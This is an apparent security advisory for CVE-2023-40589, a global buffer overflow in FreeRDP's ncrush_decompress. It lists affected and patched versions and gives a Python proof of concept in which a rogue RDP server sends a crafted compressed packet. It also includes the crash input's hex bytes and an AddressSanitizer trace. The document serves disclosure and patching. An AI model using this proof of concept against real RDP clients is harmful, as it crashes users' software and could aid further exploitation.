Headline
CVE-2023-40589: Global-Buffer-Overflow in ncrush_decompress
FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. In affected versions there is a Global-Buffer-Overflow in the ncrush_decompress function. Feeding crafted input into this function can trigger the overflow which has only been shown to cause a crash. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this issue.
Affected versions
<= 2.10.0, <= 3.0.0-beta2
Patched versions
2.11.0, 3.0.0-beta3
Summary
Global-Buffer-Overflow in ncrush_decompress
Affected
FreeRDP based clients only. FreeRDP proxy not affected as image decoding is not done by proxy (data passthrough)
PoC
async def poc(self: XRDPProcess): await asyncio.sleep(3) s = Stream.create(8192) xrdp_sec_init(self.session.rdp.sec_layer, s)
length\_p \= s.p
s.write\_uint16(0x0) \# set later
s.write\_uint16(PDUTYPE\_DATAPDU)
s.write\_uint16(self.session.rdp.mcs\_channel)
with open(
'crash-71ed942cc89efe9dfbca9184918d72ed681b929d',
'rb') as f:
xcrush\_data \= f.read()
PACKET\_COMPRESSED \= 0x20
PACKET\_COMPR\_TYPE\_RDP6 \= 0x2
s.write\_uint32(0x12345678) \# shardId
s.write\_uint8(0x99) \# pad1
s.write\_uint8(0x87) \# streamId
s.write\_uint16(0x6543) \# uncompressedLength, set later
s.write\_uint8(0x21) \# pduType2
s.write\_uint8(PACKET\_COMPRESSED | PACKET\_COMPR\_TYPE\_RDP6) \# compressedType
s.write\_uint16(len(xcrush\_data) + 18) \# compressedLength
s.write(xcrush\_data)
s\_mark\_end(s)
s.p \= length\_p
s.write\_uint16(s.end \- length\_p)
xrdp\_sec\_send(self.session.rdp.sec\_layer, s, chan\=MCS\_GLOBAL\_CHANNEL)
crash-71ed942cc89efe9dfbca9184918d72ed681b929d
0000000 1db4 5d83 e45a 2e1d b5c7 f82b beb7 ffbd
0000010 002f
Impact
None
Asan
==8831==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0001062a1f7c at pc 0x000105f02eb0 bp 0x00016b35de70 sp 0x00016b35de68
READ of size 4 at 0x0001062a1f7c thread T4
#0 0x105f02eac in ncrush_decompress+0x10f8 (libfreerdp3.3.0.0.dylib:arm64+0x2eeac) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#1 0x105f214e8 in bulk_decompress+0x310 (libfreerdp3.3.0.0.dylib:arm64+0x4d4e8) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#2 0x106179f1c in rdp_recv_data_pdu+0x5f8 (libfreerdp3.3.0.0.dylib:arm64+0x2a5f1c) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#3 0x1061853f4 in rdp_recv_tpkt_pdu+0x9d8 (libfreerdp3.3.0.0.dylib:arm64+0x2b13f4) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#4 0x1061849c4 in rdp_recv_pdu+0x34 (libfreerdp3.3.0.0.dylib:arm64+0x2b09c4) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#5 0x106180280 in rdp_recv_callback_int+0x1408 (libfreerdp3.3.0.0.dylib:arm64+0x2ac280) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#6 0x10617eda8 in rdp_recv_callback+0x1d8 (libfreerdp3.3.0.0.dylib:arm64+0x2aada8) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#7 0x1061a5508 in transport_check_fds+0x51c (libfreerdp3.3.0.0.dylib:arm64+0x2d1508) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#8 0x106180b88 in rdp_check_fds+0x170 (libfreerdp3.3.0.0.dylib:arm64+0x2acb88) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#9 0x10611b584 in freerdp_check_fds+0x1ac (libfreerdp3.3.0.0.dylib:arm64+0x247584) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#10 0x10611bc54 in freerdp_check_event_handles+0x70 (libfreerdp3.3.0.0.dylib:arm64+0x247c54) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#11 0x104da3d94 in mac_client_thread+0x5a4 (MacFreeRDP:arm64+0x13d94) (BuildId: 997a329d148832eb996db8b11452606f32000000200000000100000000000d00)
#12 0x106a29630 in thread_launcher thread.c:520
#13 0x1825a7fa4 in _pthread_start+0x90 (libsystem_pthread.dylib:arm64+0x6fa4) (BuildId: 46d35233a0513f4fbba4ba56dddc4d1a32000000200000000100000000040d00)
#14 0xa27a0001825a2d9c (<unknown module>)
0x0001062a1f7c is located 36 bytes before global variable 'LOMBaseLUT' defined in '/Users/sprout/Desktop/pwn2car/FreeRDP/libfreerdp/codec/ncrush.c' (0x1062a1fa0) of size 120
0x0001062a1f7c is located 4 bytes after global variable 'LOMBitsLUT' defined in '/Users/sprout/Desktop/pwn2car/FreeRDP/libfreerdp/codec/ncrush.c' (0x1062a1f00) of size 120
SUMMARY: AddressSanitizer: global-buffer-overflow (libfreerdp3.3.0.0.dylib:arm64+0x2eeac) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00) in ncrush_decompress+0x10f8
Shadow bytes around the buggy address:
0x0001062a1c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0001062a1d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0001062a1d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0001062a1e00: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0001062a1e80: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
=>0x0001062a1f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f9]
0x0001062a1f80: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0001062a2000: 00 00 00 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0001062a2080: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
0x0001062a2100: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x0001062a2180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Thread T4 created by T0 here:
#0 0x106faa91c in wrap_pthread_create+0x50 (libclang_rt.asan_osx_dynamic.dylib:arm64+0x4a91c) (BuildId: 4947f3677e4435f39b5765e7dbc19bf732000000200000000100000000000b00)
#1 0x106a266b0 in winpr_StartThread thread.c:568
#2 0x106a25d84 in CreateThread thread.c:650
#3 0x104da34f8 in -[MRDPView rdpStart:]+0x964 (MacFreeRDP:arm64+0x134f8) (BuildId: 997a329d148832eb996db8b11452606f32000000200000000100000000000d00)
#4 0x104da2948 in mfreerdp_client_start+0x488 (MacFreeRDP:arm64+0x12948) (BuildId: 997a329d148832eb996db8b11452606f32000000200000000100000000000d00)
#5 0x104d97b1c in freerdp_client_start+0x134 (MacFreeRDP:arm64+0x7b1c) (BuildId: 997a329d148832eb996db8b11452606f32000000200000000100000000000d00)
#6 0x104cd278c in -[AppDelegate applicationDidFinishLaunching:]+0x53c (MacFreeRDP:arm64+0x10000678c) (BuildId: f5262c7b1c22379cbcc0c60e07db60fc32000000200000000100000000000d00)
#7 0x18267b17c in **CFNOTIFICATIONCENTER_IS_CALLING_OUT_TO_AN_OBSERVER**+0x90 (CoreFoundation:arm64+0x7417c) (BuildId: 203e44018c2e3157a24b92f52551d43e32000000200000000100000000040d00)
#8 0xcf48000182716ee8 (<unknown module>)
#9 0xec26800182716e30 (<unknown module>)
#10 0xc41a80018264c4c8 (<unknown module>)
#11 0xff3c0001835aa8f0 (<unknown module>)
#12 0xb5708001858ad154 (<unknown module>)
#13 0xb94c8001858acf04 (<unknown module>)
#14 0xca1c0001858aafa0 (<unknown module>)
#15 0xf6088001858aab9c (<unknown module>)
#16 0x333b8001835d4b60 (<unknown module>)
#17 0x40068001835d49c0 (<unknown module>)
#18 0x8d140001889ad514 (<unknown module>)
#19 0x6a218001889ace40 (<unknown module>)
#20 0xff078001889a5f14 (<unknown module>)
#21 0x975180018bedeb40 (<unknown module>)
#22 0x10650001858a6044 (<unknown module>)
#23 0x727e8001858a4edc (<unknown module>)
#24 0x6b56800185899340 (<unknown module>)
#25 0x4925000185870790 (<unknown module>)
#26 0x8b79000104cd2020 (<unknown module>)
#27 0x18224ff24 (<unknown module>)
#28 0x1e1efffffffffffc (<unknown module>)Related news
Gentoo Linux Security Advisory 202401-16
Gentoo Linux Security Advisory 202401-16 - Multiple vulnerabilities have been discovered in FreeRDP, the worst of which could result in code execution. Versions greater than or equal to 2.11.0 are affected.
Ubuntu Security Notice USN-6401-1
Ubuntu Security Notice 6401-1 - It was discovered that FreeRDP did not properly manage certain inputs. A malicious server could use this issue to cause FreeRDP clients to crash, resulting in a denial of service, or possibly obtain sensitive information. It was discovered that FreeRDP did not properly manage certain inputs. A malicious server could use this issue to cause FreeRDP clients to crash, resulting in a denial of service, or possibly execute arbitrary code.